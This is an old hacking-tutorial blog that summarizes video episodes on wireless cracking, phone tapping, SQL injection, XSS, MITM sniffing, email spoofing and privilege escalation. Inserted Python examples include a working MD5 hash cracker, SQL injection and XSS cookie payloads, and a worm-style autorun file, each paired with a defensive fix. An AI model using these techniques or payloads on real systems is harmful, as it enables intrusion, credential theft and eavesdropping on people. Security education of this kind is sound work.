Wireless Hacking - Cracking WEP

Friday, December 5, 2008

The second episode of Full Disclosure is now released. This episode covers how to crack WEP encryption, and why it is so easy to crack. The shownotes are published in the wireless hacking section of the forums.

Download video here

Wireless Hacking - DeAuth

The third episode of Full Disclosure is a short one; however, it is a necessary step in cracking WPA-PSK, which will be our next video. Basically this attack just disconnects all the users on a wireless network. The attacker does not need to know the WEP or WPA key or be connected to the network. This attack is illegal in many states, so this video is for educational reasons only.

Download video here

Lock Picking - Bump Key

This is the first of our Lock Picking series. In this episode we describe how to make and use a bump key to quickly unlock most residential-grade locks.

Download video here (Right Click -> Save Link as)
Video Shownotes here

Phone Phreaking - Beige Box

In this episode of Full Disclosure we demonstrate how to tap a phone line with the old-school Beige Box! We are planning to have many Phone Phreaking (telephone hacking) episodes, such as Sniffing VoIP, Hacking COCOTs, and Red Boxing, to name a few.

Download video here (Right Click -> Save Link as)

Phone Phreaking/Network Hacking - Sniffing VoIP

Our seventh episode is a mix between Phone Phreaking and Network Hacking. In this episode we demonstrate how to sniff Voice Over IP conversations, which basically means how to tap an internet phone. We thought that this would be a good video to follow the beige box.

Download video here (Right Click -> Save Link as)

Lock Picking - DIY Padlock Shims

This is our second video in our Lock Picking series. In this video we explain how to make and use padlock shims. Padlock shims are used to unlock spring-latch padlocks.

Download video here (Right Click -> Save Link as)

Lock Picking - Multi-Disc Combo Locks

This is our third video in our Lock Picking series; after this video we will return to computer hacking videos for a while. In this video we demonstrate how to unlock the Master Lock 653D, Targus Defcon CL, and the Master Lock 175. The different methods shown in this video will not only help you unlock these three locks, but also help you develop your own way to crack other multi-disc combo locks that you may come across.

Download video here (Right Click -> Save Link as)

Local Privilege Escalation Vulnerability in Cisco VPN Client

Recently a local privilege escalation vulnerability was found in Cisco’s VPN Client. When Cisco VPN Client is installed, a Windows service “Cisco Systems, Inc. VPN Service” is created. The service runs the binary C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe as Local System. Therefore, if you replace cvpnd.exe with another executable, that program will be run at startup with root privileges! I found this vulnerability interesting because it is used at my college to authenticate students when they connect to the wireless network. For that reason, almost every student with a laptop has this software installed, and students are allowed to borrow school laptops from the student center to use the wireless internet. Consequently, anyone could borrow a laptop, gain root access through the vulnerability, and install a keylogger that sends every keystroke to the attacker’s email! It’s been 5 days since this vulnerability was discovered, and Cisco has already issued a patched version. However, how long will it take for the school to update all their computers? This is just another reason why you should be careful when using school computers!

Video Demonstration: (shows how to gain root access and change the Admin password with this vulnerability)

Hacking Basics - MD5

In this episode of Full Disclosure we demonstrate how to crack MD5 password hashes. MD5 (Message-Digest algorithm 5) is a hash function commonly used by websites to encrypt passwords. MD5 is a one-way hash; therefore, to crack the password you must try every possible dictionary word and, if that does not work, every possible letter/number/symbol combination. The programs we use to crack the passwords are Cain and MDCrack-NG.
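To make the two phases described above concrete, here is an added example (not code from the episode or from Cain/MDCrack-NG) that runs a dictionary pass and then a short brute-force pass against an unsalted MD5, and contrasts it with the salted, slow storage a defender should use instead. The wordlist, target passwords and charset are constructed for the demonstration.

```python
import hashlib
import hmac
import itertools
import os
import string
from typing import Optional

# Constructed wordlist standing in for the dictionary file fed to a cracker.
# Real lists run to millions of entries; the technique is identical.
WORDLIST = ["password", "letmein", "qwerty", "sunshine", "dragon", "monkey"]


def md5_hex(word: str) -> str:
    """Unsalted MD5 of a candidate password, hex-encoded as websites store it."""
    return hashlib.md5(word.encode()).hexdigest()


def dictionary_attack(target_hash: str, wordlist) -> Optional[str]:
    """Phase 1: hash every dictionary word and compare to the leaked hash.

    Because there is no salt, one MD5 computation per word is all it costs.
    """
    for word in wordlist:
        if hmac.compare_digest(md5_hex(word), target_hash):
            return word
    return None


def brute_force(target_hash: str, charset: str, max_len: int) -> Optional[str]:
    """Phase 2: every combination of the charset up to max_len characters.

    Work grows as len(charset) ** length, which is why only short or
    low-entropy passwords fall to this step in practice.
    """
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if hmac.compare_digest(md5_hex(candidate), target_hash):
                return candidate
    return None


def precompute_table(wordlist) -> dict:
    """Why unsalted hashes are worse than they look: hash the list once, and
    every leaked hash afterwards is a single dictionary lookup."""
    return {md5_hex(w): w for w in wordlist}


def store_password(password: str, iterations: int = 50_000) -> tuple:
    """Defender's alternative: a random per-user salt plus a slow KDF (PBKDF2),
    so a table built for one user is useless for the next and each guess is
    deliberately expensive. Returns (salt, iterations, derived_key)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, dk


def verify_password(password: str, record: tuple) -> bool:
    """Recompute PBKDF2 with the stored salt and compare in constant time."""
    salt, iterations, dk = record
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(cand, dk)


if __name__ == "__main__":
    leaked = md5_hex("sunshine")  # constructed "leaked" hash
    print("dictionary:", dictionary_attack(leaked, WORDLIST))
    print("brute force:", brute_force(md5_hex("a1"), string.ascii_lowercase + string.digits, 2))
    rec = store_password("sunshine")
    print("pbkdf2 verify:", verify_password("sunshine", rec))
```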

Download video here (Right Click -> Save Link as)

Website Hacking - SQL Injection

For Infinity Exists Full Disclosure’s first Website Hacking episode, we demonstrate how to exploit a security vulnerability in a website’s database layer to extract password hashes. SQL (Structured Query Language) is a computer language designed for the retrieval and management of data in a system’s database. The attack, known as SQL Injection, manipulates SQL statements before they are sent to the SQL server, allowing the attacker to create, change, or retrieve data stored in the database. SQL Injection is a hard concept to understand, so we made a video that encompasses all our knowledge on the subject to make it easier for our viewers to grasp.
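The mechanism in one place: an added example (not the episode’s code) with a vulnerable lookup that pastes user input into the SQL text beside the parameterized version, run against a constructed in-memory SQLite table of usernames and MD5 hashes. The table, usernames and inputs are all constructed here.

```python
import hashlib
import sqlite3

# Constructed sample data: a users table of the kind a forum keeps,
# storing unsalted MD5 hashes (the data the episode extracts).
USERS = [
    ("alice", hashlib.md5(b"correct horse").hexdigest()),
    ("bob", hashlib.md5(b"battery staple").hexdigest()),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: the untrusted value becomes part of the statement text.

    A quote in the input ends the string literal, and whatever follows is
    parsed as SQL, so the caller no longer controls what the query does.
    """
    sql = f"SELECT username, password_hash FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: a bound parameter keeps the value outside the SQL grammar,
    so quotes and comment markers in the input are just characters."""
    sql = "SELECT username, password_hash FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo() -> dict:
    """Row counts each variant returns for an honest and a tampered input."""
    conn = make_db()
    honest = "alice"
    # Tampered input: the quote closes the literal, OR '1'='1' makes the
    # WHERE clause true for every row, and '--' comments out the trailing quote.
    tampered = "x' OR '1'='1' --"
    return {
        "vulnerable_honest": len(lookup_vulnerable(conn, honest)),
        "vulnerable_tampered": len(lookup_vulnerable(conn, tampered)),
        "safe_honest": len(lookup_safe(conn, honest)),
        "safe_tampered": len(lookup_safe(conn, tampered)),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s)")
```

The vulnerable path hands back every user’s hash for the tampered input; the parameterized path returns nothing, because it searches for a user literally named `x' OR '1'='1' --`.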

Download video here (Right Click -> Save Link as)

Hacking Basics - Backtrack

On the forums, there have been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many of these questions as possible. In this episode we cover: where to get Backtrack 2, how to burn an .ISO file, how to boot Backtrack 2, how to log in, and how to start the GUI. Also, we illustrate basic Linux commands and how to set up your network interfaces.

Download video here (Right Click -> Save Link as)

How to use Intel Pro/Wireless 3945ABG in Backtrack 2

The Intel Pro/Wireless 3945ABG (IPW3945) is a popular wireless card that is built into many laptops. However, the drivers included in Backtrack 2 do not allow you to do packet injection. To fix this problem you need to install the IPWRAW drivers. The easy way to do this is to use a Backtrack 2 module. A module adds additional components to Backtrack 2. To add a module, you copy the .LZM file into the modules folder in the BT2 .ISO. After adding the IPWRAW module to the BT2 .ISO, boot up Backtrack and click the “IPW3945 RAW load.sh” script on the desktop to install the IPWRAW drivers. After the drivers are installed your wireless card will be locked in monitor mode, and you will be able to do packet injection with aireplay-ng. If you want to put your wireless card in managed mode and connect to a wireless network, click the “IPW3945 load.sh” script on the desktop. That script will load the default IPW3945 drivers.

Video Demonstration

Download IPWRAW Module Here
Discuss Here

Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius

SQL Injection Challenge!

I’m proud to announce the first Infinity Exists’ Hacking Challenge! The challenge is to find a SQL Injection flaw in our forums and exploit it to extract password hashes. The first person to complete this challenge will receive a free Infinity Exists T-shirt. The SQL Injection vulnerability is hidden deep in Infinity Exists’ forums, and will be much harder to find than the vulnerability demonstrated in Full Disclosure Episode 11. Tips to help you get started:

  1. Watch Full Disclosure Episode 11!
  2. Download Wp-Forums Source Code
  3. The variable that is used to manipulate the SQL statement is a POST variable.

Good Luck!
—————————————————————————————————————————–
Update!
marcel.romard and esc both won Infinity Exists’ SQL Injection Challenge!! Marcel.romard found the SQL injection flaw in the forum’s search that this challenge was based around. Esc found a SQL Injection flaw that we were unaware of in the forum’s RSS feed. Congrats to both of you!

SQL Injection Challenge How-to

The SQL Injection Challenge has already been completed, so here is a video demonstration of how to find this SQL Injection flaw and exploit it to extract password hashes. In this video I use a Firefox plugin, ‘Data Tamper’, that can be downloaded here.

Full Size Video
Download Here

SIUC’s Network

I currently attend Southern Illinois University at Carbondale, and I am taking Digital Circuit Design with Dr. Weng, who also teaches Network Processing Systems Design. Today in class he invited all his students to go on a tour of SIUC’s computer network with his Network Processing Systems class. Of course I took up his offer, because it is not every day a regular student can walk into the core networking room and server mainframe of a large university. Basically, the network is set up on a three-layer infrastructure (Core Layer, Distribution Layer, Access Layer). At the Access Layer (the layer that provides network access to client computers) the University uses Cisco Catalyst 2950 switches. Those switches are connected via cross-over cable to the Distribution Switch, which is a Cisco Catalyst 3524. In turn, the Distribution Switch connects via fiber to the Core Switch, which is a Cisco Catalyst 6509. The entire network runs at 1 Gigabyte; however, the internet bandwidth is capped at 300 Mb! Furthermore, only 90 Mb of bandwidth is dedicated to the Residence Halls!! All the Core Switches go to the student center where the internet point of entry is located. Also, internet traffic is filtered through a SourceFire firewall. Some more interesting networking facts: SIUC has 9 Wireless APs (I believe) which are managed by a Cisco Wireless LAN Controller; for access control they use Cisco 1111; for VPN they use a Cisco VPN Concentrator 3000; and for their servers they use Sun System SunFire. An interesting security fact is that they only use SSH to configure switches remotely, because the web interface has security issues. Lastly, you probably noticed that most of their networking devices are Cisco; this is for compatibility reasons, as they had problems in the past from using multiple vendors. Well, that’s about it; hope you enjoyed hearing about SIUC’s Network.

Typical Network Layout of a SIUC Building:

My Dorm’s Network Layout:

Infinity Exists Featured On 60 Minutes

CBS’s 60 Minutes ran a segment on internet insecurities and they showed the ease of finding tutorials on youtube to exploit them. They chose our video on cracking WEP to demonstrate and showed a short clip of it. The segment is up on the CBS website and you can check it out here. Thank you CBS for the free publicity!
—————————————————————————————————————————–
Update - Live Stream

Website Hacking - XSS

In this episode of Full Disclosure we explain the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client-side script such as JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.
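An added example (not the episode’s code) showing the two sides of the flaw described above: a guestbook renderer that concatenates stored comments straight into HTML (Persistent XSS; the same concatenation on a search echo would be the Non-Persistent form) beside the escaped version, plus the HttpOnly/Secure cookie attributes that blunt the cookie-theft outcome. The page template, comment text and session id are constructed.

```python
import html
from http.cookies import SimpleCookie

# Constructed page template; {items} is where stored user comments land.
PAGE = "<html><body><h1>Guestbook</h1><ul>{items}</ul></body></html>"


def render_vulnerable(comments) -> str:
    """Vulnerable: each comment is pasted into the markup unchanged, so a
    comment containing <script> is stored once and runs for every visitor."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return PAGE.format(items=items)


def render_hardened(comments) -> str:
    """Hardened: html.escape turns <, >, &, quotes into entities, so the
    browser shows the comment as text and never parses it as markup."""
    items = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return PAGE.format(items=items)


def contains_live_script(markup: str) -> bool:
    """Crude check used here to compare the two renderers: does the output
    still contain an un-escaped script tag the browser would execute?"""
    return "<script" in markup.lower()


def session_cookie_header(session_id: str) -> str:
    """Defence in depth for the cookie-theft case: HttpOnly keeps the cookie
    out of document.cookie (so injected script cannot read it), Secure limits
    it to HTTPS, SameSite=Lax limits cross-site sending."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar.output(header="").strip()


if __name__ == "__main__":
    # Constructed stored comment: the classic proof-of-concept payload.
    comments = ["nice videos!", "<script>alert(document.cookie)</script>"]
    print("vulnerable executes script:", contains_live_script(render_vulnerable(comments)))
    print("hardened executes script:  ", contains_live_script(render_hardened(comments)))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```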

Download video here (Right Click -> Save Link as)

The 60 Minutes Effect

As most of you already know, Infinity Exists’ Full Disclosure Ep. 2 WEP Cracking was featured on CBS’s 60 Minutes “High-Tech Heist” for about 10 seconds. Those few seconds on national television gave us about 40,000 hits on YouTube, and about 750 unique hits on InfinityExists.com. Weeks after the 60 Minutes episode aired Infinity Exists is still getting an average of 300 unique hits a day. This is pretty good compared to our 200-hit average before.

However, 60 Minutes brought Infinity Exists to the attention of a few unwanted people. For Example:

People that do not understand what it is to be a hacker simply think we are criminals. A hacker truly is a computer enthusiast that enjoys exploring various computer systems in the pursuit of more knowledge. A hacker’s goal is never to harm anyone or anything, as the media would like you to believe. The goal of Infinity Exists’ video series Full Disclosure is to inform people about specific security flaws. If there was no one to disclose this information to the general public then everyone would still be using insecure technology and would be at the mercy of criminal crackers.

Exploit Hacking

Since Infinity Exists hasn’t had time to release a new episode, I decided to revamp a two-part series, Exploit Hacking and Exploit Hacking 2 - Privilege Escalation, that I made a year before Infinity Exists was created. It may be a little dated, but it provides great information on how a hacker can find a vulnerability on a remote computer and exploit it to gain remote access. Also, the video shows how a hacker can raise their privileges on the remote machine to administrator. I added text throughout the video to make it easier to understand. Furthermore, Infinity Exists plans to do a more up-to-date and more detailed series of episodes on “exploit hacking.”

Full Scale Video Here
Download Here

USB Worm (Jamesgo.dll)

The other day my computer was infected by a USB Worm known as Jamesgo.dll. I received the virus when I inserted my girlfriend’s USB thumb drive. The worm modified the autorun.inf file on the thumb drive, so it was able to automatically transfer itself to all my hard disk drives (Click Here to view autorun.inf). There is little information on the internet about this virus, so I had to figure out my own way to remove it. By analyzing the autorun.inf (which the virus cleverly changed to a system hidden file, and later I found out that it modified the registry so system hidden files are never displayed) I discovered that each drive contains the Visual Basic Script test.vbs (Click Here to view Test.vbs). Basically what the file does is copy test.bat, test.reg, autorun.inf, autorun.ico, and itself to every hard disk in the system. Also, it runs every 60 seconds, so if you delete it from one drive, within 60 seconds it will recopy itself from a different drive. Furthermore, test.reg simply edits the registry so test.bat runs on startup and prevents system hidden files from being displayed. Test.bat runs the VB script and changes the files to system, hidden, archived, and read-only (Click Here to view Test.reg and Click Here to view Test.bat). To remove the virus I crafted a batch file that changes all the test files and autorun to normal files (attrib -s -h -r test.*, attrib -s -h -r autorun.*), and then deletes them. Since the batch file can delete all the files quickly, the worm does not have a chance to recopy itself to all the disk drives. Also, I manually removed all entries of test.bat from the registry (Click Here to view Fix).
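The autorun.inf is the first thing to inspect on a suspect drive, so here is an added example (not the author’s fix script, and not the worm’s actual file) that parses an autorun.inf and reports the directives that make Windows launch something from the drive. Both sample files below are constructed: one modelled on the behaviour described in the post (a script started on insertion), one a benign vendor disc.

```python
import configparser
import re
from typing import List, Tuple

# Directives that run a program when the drive is inserted or opened.
EXEC_KEYS = ("open", "shellexecute")
# File types a legitimate autorun.inf has little reason to point at.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|bat|cmd|js|jse|wsf|exe|scr|pif|com)\b", re.IGNORECASE)

# Constructed sample modelled on the post's description (a VBScript launched
# on insertion, with a misleading AutoPlay label). Not the real worm's file.
SUSPECT_AUTORUN = """[autorun]
open=wscript.exe //B test.vbs
icon=autorun.ico
shell\\open\\command=wscript.exe //B test.vbs
shell\\open=Open
action=Open folder to view files
"""

# Constructed benign example: only cosmetic keys.
BENIGN_AUTORUN = """[autorun]
icon=setup.ico
label=Vendor Driver Disc
"""


def analyze_autorun(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value, reason) findings for the [autorun] section."""
    parser = configparser.RawConfigParser(strict=False, delimiters=("=",))
    parser.optionxform = str  # keep key case so findings match the file
    parser.read_string(text)
    # Windows accepts any capitalisation of the section name.
    section = next((s for s in parser.sections() if s.lower() == "autorun"), None)
    if section is None:
        return []
    items = parser.items(section)
    launches = any(k.lower() in EXEC_KEYS or
                   (k.lower().startswith("shell\\") and k.lower().endswith("\\command"))
                   for k, _ in items)
    findings = []
    for key, value in items:
        lkey = key.lower()
        if lkey in EXEC_KEYS:
            findings.append((key, value, "runs a program when the drive is inserted"))
        elif lkey.startswith("shell\\") and lkey.endswith("\\command"):
            findings.append((key, value, "runs a program from the drive's Explorer menu"))
        elif lkey == "action" and launches:
            findings.append((key, value, "custom AutoPlay text alongside a launch directive"))
        else:
            continue
        if SCRIPT_EXT.search(value):
            findings.append((key, value, "target is a script or executable on the drive"))
    return findings


def is_suspicious(text: str) -> bool:
    """True when the file would launch anything at all from the drive."""
    return any(reason.startswith("runs") for _, _, reason in analyze_autorun(text))


if __name__ == "__main__":
    for name, sample in (("suspect", SUSPECT_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(f"{name}: suspicious={is_suspicious(sample)}")
        for key, value, reason in analyze_autorun(sample):
            print(f"  {key}={value!r}: {reason}")
```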

To prevent a USB Worm from infecting your computer:
1) Go to Start -> Run
2) Type “gpedit.msc” (This is the group policies editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”

In conclusion, the Jamesgo.dll USB Worm is not a risk for your computer, but it is really annoying! Also, it is a perfect example of how easy it is to create a worm that travels through removable media. If you want to mess around and modify the Jamesgo.dll script you can download it here. If you want to learn more on how to use Autorun and batch files to create an “Auto Hacking USB Thumb Drive” go here.

Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.

Staying Secure - SSH Tunnel

The wait is finally over! This new episode of Full Disclosure shows you how to use an SSH Tunnel to secure your data when you are on an untrusted LAN (e.g. a coffee shop, your school’s network, or Defcon). Furthermore, you can use the SSH Tunnel to bypass the LAN’s internet filters. The SSH tunnel works by encapsulating your data in an encrypted payload and transmitting it to the SSH server, which is set up on a trusted LAN.

Live Stream Here
Download Here

Links:
OpenSSH for Windows, Putty, Proxifier

Wireless Hacking - Cracking WPA

This episode of Full Disclosure illustrates the process of cracking weak WPA Preshared Keys. Before you can crack the Preshared Key you must capture the four-way handshake between the Access Point and a client; to accomplish this you must force the client to reconnect to the AP with the DeAuthentication attack we showed in episode 3. If you are using the Linksys WUSB54GC you will have to update your drivers to the RaLink RT73 USB Enhanced Driver. In this episode we show you how to do this, and I also made a Backtrack module to automate the process. The module works in the same way as the IPWRAW Module for the Intel Pro/Wireless 3945ABG card, so you can watch that Vblog if you are having trouble.

Live Stream Here
Download Here

Download RT73 Module Here
Watch IPWRAW Vblog Here

Singing Tesla Coil

This weekend was UIUC’s annual Engineering Open House, and last night there was a Singing Tesla Coil show. The Tesla coils were built by Steve Ward, an EE student at UIUC. “Steven has developed Tesla Coils with high levels of control allowing audio modulation of their lightning-like display. Interfacing the Continuum Fingerboard with this technology will generate a musically expressive and highly energetic, multi-voiced performance” (EOH Exhibit Guide).

Full Scale Video Here
Download Here

McAfee SiteAdvisor

An anonymous viewer brought to my attention that McAfee’s so-called “SiteAdvisor” had labeled Infinityexists.com with the big evil red X.

It turns out that McAfee SiteAdvisor scanned Infinity Exists and found the Jamesgo.dll Worm, which I uploaded so you guys can see how it works. Not only is the virus zipped to prevent anyone from accidentally running it, but also, there is an explanation on how to remove the virus in the blog post.

(I have to agree with the Nuisance ‘O Meter. Jamesgo is definitely an 8!)

Don’t get me wrong, I think it is a good idea for McAfee to try to inform non-techie computer users that those free screensavers are going to mess up their computer. I just think McAfee should take into account the content of the website instead of just blindly scanning the internet for viruses. Now people interested in computer hacking will be disinclined to visit Infinity Exists because they’ll see this:

Well anyways, that’s my rant on McAfee SiteAdvisor.

Tapping a 66 Block Telephone Network Interface

A while ago I was asked to rewire a company’s 66 Block, a type of punchdown block used to connect sets of wires in a telephone system, because they wanted to replace their plain old telephone service (POTS) with multiple VoIP telephone lines. I had little knowledge of the 66 Block before doing this job, so I got out my trusty Beige Box to figure out how it was wired. Here’s a short video on how to tap a 66 Block. (Watch Episode 6 if you need help making a Beige Box.)

Full Scale Video Here
Download Here

Triple Boot - Windows, Backtrack, & Ubuntu

For episode 17, we demonstrate how to triple boot a computer with Windows, Backtrack, and Ubuntu. Nox and I go through the process of setting up the various disk partitions, installing Backtrack and Ubuntu to different partitions, and how to configure your computer to boot between each of the Operating Systems. Hopefully, this episode will give you guys insight on how to go about multibooting your computer with several different OSs.

Live Stream Here
Download Here

Download Backtrack
Download Ubuntu

Dual Boot - Windows & Backtrack

We said we would release a Vblog on how to dual boot Windows and Backtrack, so here it is. The process is slightly different: there is no need for an extended partition because you only need four primary partitions, and we use Lilo for the boot loader. Since we aren’t installing Ubuntu we have to manually create and configure the Linux swap partition. Also, we have to manually configure Lilo; however, this allows us to change the splash image when your computer starts.

Full Scale Video Here
Download Here

Local Password Cracking

In this edition of Full Disclosure, Nox and I show you how to crack local Linux and Windows passwords. Furthermore, we explain how to reset and restore Linux or Windows passwords for temporary access to a computer. There are different trade-offs for each method of bypassing local passwords. Cracking a password can take a long time, but knowing the password may help you gain access to other computers and programs. Resetting and restoring a password is quick because you don’t need to know the password, but you will have to repeat this method every time you want access to the computer.

Live Stream Here
Download Here

Ophcrack
Cain

Introduction

Infinity Exists Underground is a new video series based completely on viewer submissions. If you have an educational video on hacking, lock picking, modding, etc. send an email explaining what your video is about to underground@infinityexists.com. Nox and I will review the emails and if it sounds like a good informative video we will give you access to the video upload page so you can submit your video. We may edit your video slightly to make it clearer, but you will get credit for creating the video. Also, you can remain anonymous if you are making a questionable video. We hope to get many viewer submissions so that we can get more content on the site and also get you guys more involved.

Full Scale Video Here
Download Here

Lock Picking Basics

Our 19th video is a continuation of our lock picking series. In this episode, we explain how to pick a deadbolt lock using the Lifter Picking method.

Live Stream here
Download video here

Email Spoofing

The first Underground video explains how to send fake emails, a.k.a. Email Spoofing. This video, submitted by Crash Overron, covers two methods of email spoofing. The first and older method is connecting directly to the SMTP server with Telnet; however, this method is usually blocked by the email provider. The second method utilizes the mail() function in PHP.

Full Scale Video Here
Download Here

Download Email_Spoof.php
(Right Click -> Save As Email_Spoof.php)

Metasploit Autopwn

In this Underground video, Copy explains how to use Metasploit’s Autopwn. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. Autopwn is a tool in Metasploit Framework version 3 that automates the exploitation process. Copy demonstrates how to use Autopwn in both Backtrack 2 and Backtrack 3.

Full Scale Video Here
Download Here

The Metasploit Project
For more information on the Metasploit Framework check out my Exploit Hacking video.

Recovering an Acer Computer

Last Thursday, my Acer Travelmate laptop crapped out on me and stopped booting Windows XP. I tried everything to fix it: booting into safe mode, using the Windows Recovery Console to fix the boot.ini, fixing the corrupted partition boot sector with Fixboot, and fixing the Master Boot Record with Fixmbr. I even tried to reinstall Windows, but it still wouldn’t boot! So I decided I would just back up all my stuff with a liveCD, format the drive, and use the recovery CD to start all over. Guess what? Acer doesn’t ship their laptops with a Recovery CD; they require you to burn it yourself when you first get the computer, and of course I was way too lazy to do that. Well, after some research I found out there is a hidden recovery partition that the Acer repair people use to fix your computer. If you are having the same problem as me, here’s how I accessed the hidden partition and recovered my computer.

1. Boot your computer with the Backtrack liveCD (I used BT2 because it was the only thing I had off hand)
2. Backtrack will automatically mount the hidden drive (sda1). Navigate to it in the /mnt/sda1 folder.
3. Copy mbrwrwin.exe and rtmbr.bin from the /mnt/sda1 folder to the /mnt/sda2 folder (your C drive).
4. Next, you need to run the mbrwrwin install rtmbr.bin command. You can do this a couple different ways: You can use the Windows Recovery Console to run the command, or use a Windows LiveCD like BartPE (http://www.nu2.nu/pebuilder/). I used BartPE because I already tried to re-install windows and I couldn’t access the recovery console because I wasn’t able to set an Administrator password.
5. Restart your computer, and press Alt-F10 at the Acer splash screen. This will bring you to the Acer eRecovery on the hidden partition, and all you have to do is follow the directions to restore the factory settings. (If you can’t access the eRecovery make sure d2d recovery is enabled in BIOS. You can access the BIOS by pressing F2 at the Acer splash screen).
6. After your computer is restored, burn the damn recovery cd so you don’t have to do this next time!!!

For more information check out:
http://forum.notebookreview.com/showthread.php?t=175697
http://forum.notebookreview.com/showthread.php?t=11476

Application Patching

Crash Overron’s second Underground video explains how to use OllyDbg to manipulate a simple program. OllyDbg is a debugger that analyzes binary code. Not only does Olly allow you to step through an executable’s assembly code, but it can also trace registers and recognize procedures, API calls, switches, tables, constants and strings. Crash Overron utilizes a feature in Olly to locate a referenced text string that is displayed when an invalid serial key is entered. Once the string is located, he can find the compare statement that checks the user’s serial key, and change the flow of the program so that his serial key is accepted.

Full Scale Video Here
Download Here

Download OllyDbg
Download Application

Ettercap

For this episode of Full Disclosure, we illustrate the many features of Ettercap. Ettercap is a program designed to sniff passwords on a LAN. It can recognize several different packets that contain passwords, including HTTP, Telnet, FTP, POP, Rlogin, SSH1, ICQ, SMB, MySQL, NNTP, X11, IRC, IMAP, VNC, SNMP, MSN, YMSG, etc. Furthermore, Ettercap can utilize Man-in-the-Middle attacks to hijack packets and redirect them to the attacker’s computer, allowing it to extract passwords. In this episode, we show you how to use ARP Poisoning, DHCP Spoofing, and Port Stealing MITM attacks and explain how they work. Also, we explain how to configure Ettercap to sniff encrypted passwords over the Secure Sockets Layer (SSL and HTTPS). Moreover, Ettercap can be easily programmed to modify network traffic with the use of Filters. We demonstrate how to make many different Ettercap Filters. Ettercap comes with numerous plugins to extend Ettercap’s abilities; we explain how to use the Check Poison, Re-Poison, DNS Spoofing, Isolate, DoS Attack, Find IP, Gateway Discover, Search Promisc, Arp Cop, and Scan Poisoners plugins. Lastly, we demonstrate how to use Ettercap’s Passive OS Fingerprinting feature. Ettercap supports passive dissection of many protocols, allowing it to identify a host’s Operating System and services.

Live Stream Here
Download Here

This Full Disclosure episode is very lengthy, almost 50 minutes, so if you have any questions feel free to ask them on the forums.

Download Ettercap (Linux)
Download Ettercap (Windows)

Filters:
Irongeek’s Image Altering Filter
Patchy’s Wordpress Filter
Patchy’s Myspace Filter

Windows SMB Relay Exploit

In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 machine. He exploits a flaw in Windows Server Message Block (SMB), which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploit Framework to run the exploit. It works by relaying an SMB authentication request to another host, which provides Metasploit with an authenticated SMB session; if the user is an administrator, Metasploit will be able to execute code on the target computer, such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform an SMB authentication attempt by using an Ettercap Filter.

Full Scale Video Here
Download Here
Download Ettercap Filter Here

Beer Pong Table

The last few days I’ve been helping my friend Charlie construct his Illinois State University (ISU) Beer Pong Table. The legs and supports of the table are made from his roommate Brandon’s hockey sticks, and the table top is made of plywood with a 1/8″ sheet of Acrylic on top. Our friend Tyler etched ISU’s mascot, Red Bird, into the Acrylic; it was done free-hand with a dremel (Compare his etching to image). Tyler also did the text on the table: “ISU” and “What you call Addiction … We call Dedication”. I did the LED array and the wiring; when the LEDs are lit, the light catches the etching in the acrylic. The LED controller I made allows you to switch between the LEDs being constantly on or controlled by an audio input. However, the LEDs we used are only lit at a specific voltage, so it doesn’t work very well.

Full Scale Video Here
Download Here
Pre-Amp Schematic

XSS Tunnel

· 0 comments

XSS Shell is a cross-site scripting backdoor into the victim’s browser which enables an attacker to issue commands and receive responses. During a normal XSS attack an attacker only has one chance to control a victim’s browser; however, the XSS Shell keeps the connection between the attacker and the victim open to allow the attacker to continuously manipulate the victim’s browser. XSS Shell works by setting up an XSS Channel, an AJAX application embedded into the victim’s browser, that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell’s JavaScript reference by utilizing an XSS flaw on a website. Once the victim’s browser is infected with the XSS Shell and the XSS Channel is created, the attacker can issue instructions to the infected browser. Also, the attacker can use an XSS Tunnel to transfer HTTP traffic through the XSS Channel and the victim’s browser, thereby using the victim’s credentials to bypass authentication and IP restrictions. The XSS Tunnel is an HTTP proxy that sits on an attacker’s computer, and any tool that is configured to use it will tunnel its traffic through the XSS Channel.

Live Stream Here
Download Here

Download XSS Shell and Tunnel

Read More......

Password Phishing

